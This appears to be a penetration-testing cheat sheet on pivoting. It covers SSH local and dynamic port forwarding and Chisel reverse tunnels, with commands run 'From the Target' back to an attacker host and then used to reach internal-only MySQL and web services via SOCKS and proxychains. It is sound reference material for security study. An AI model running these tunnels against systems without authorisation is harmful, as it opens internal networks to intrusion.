PIVOTING, TUNNELING, PORT FORWARDING

PRIMARY CATEGORY → PENTESTING ROOT

Local Port Forwarding

SSH

From the Attacker

ssh -p<PORT> -fN -L <LOCAL_PORT>:localhost:<TARGET_PORT> <USER>@<TARGET>

e.g.

If there is a port 3306 that can only be accessed locally, perform local port forwarding to establish a tunnel from a given local port to the remote port 3306

ssh -p22 -fN -L 3306:localhost:3306 john@domain.tld

Then, to connect to that port using the mysql client →

mysql --user='john' --password='anyRandomPassword' --host='localhost' --port=3306 --database='database'

Chisel

Reference

From the Attacker

./chisel server --reverse --port <PORT>

From the Target

./chisel client <ATTACKER>:<CHISEL_PORT> R:<ATTACKER_PORT>:localhost:<TARGET_PORT>

e.g.

If there is a port 3306 that can only be accessed locally, perform local port forwarding to establish a tunnel from a given local port to the remote port 3306

This time, the target initiates the connection to the chisel server and, again, the attacker establishes the tunnel

• From the Attacker ⚔️

./chisel server --reverse --port 1234 	

• From the Target 🎯

./chisel client 10.10.10.10:1234 3306:localhost:3306

Then, to connect to that port using the mysql client →

mysql --user='john' --password='anyRandomPassword' --host='localhost' --port=3306 --database='database'

---

Dynamic Port Forwarding

SSH

From the Attacker

ssh -p<PORT> -fN -D <SOCKS_PORT> <USER>@<TARGET>

It sets up a SOCKS5 Proxy on the localhost:<PORT>

e.g.

If there is another host, on the internal network, running a Web Server on port 8080, which is not accesible from the internet, and an attacker wants to connect to this Web Server and its database as well, proceed as follows

ssh -p22 -fN -D 1234 john@server1.domain.tld

To send an HTTP Request to the internal server

curl --silent --location --request GET --socks5 localhost:1234 "http://server2.domain.tld"

If any DNS Error arises, use --socks5-hostname localhost:<PORT>

Assuming that the Database is not only running on locahost and is accessible from all other internal hosts, to connect to it

/etc/proxychains.conf

socks5 127.0.0.1 1234

proxychains mysql --user='john' --password='anyRandomPassword' --host='server2.domain.tld' --port=3306 --database='database'

Chisel

Reference

From the Attacker

./chisel server --reverse --port <PORT> --socks5 # Default Socks Port -> 1080
./chisel server --reverse --port <PORT> --socks5 <PORT> # Specific Port

From the Target

./chisel client <ATTACKER>:<CHISEL_PORT> R:socks

e.g.

If there is another host, on the internal network, running a Web Server on port 8080, which is not accesible from the internet, and an attacker wants to connect to this Web Server and its database as well, proceed as follows

• From the Attacker ⚔️

./chisel server --reverse --port 1234 --socks5 

• From the Target 🎯

./chisel client 10.10.10.10:1234 R:socks:5555

To send an HTTP Request to the internal server

curl --silent --location --request GET --socks5 localhost:5555 "http://server2.domain.tld"

If any DNS Error arises, use --socks5-hostname localhost:<PORT>

Assuming that the Database is not only running on locahost and is accessible from all other internal hosts, to connect to it

/etc/proxychains.conf

socks5 127.0.0.1 5555

proxychains mysql --user='john' --password='anyRandomPassword' --host='server2.domain.tld' --port=3306 --database='database'